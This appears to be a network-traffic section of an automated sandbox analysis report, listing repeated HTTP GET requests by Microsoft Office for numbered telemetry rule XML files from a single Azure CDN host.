Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
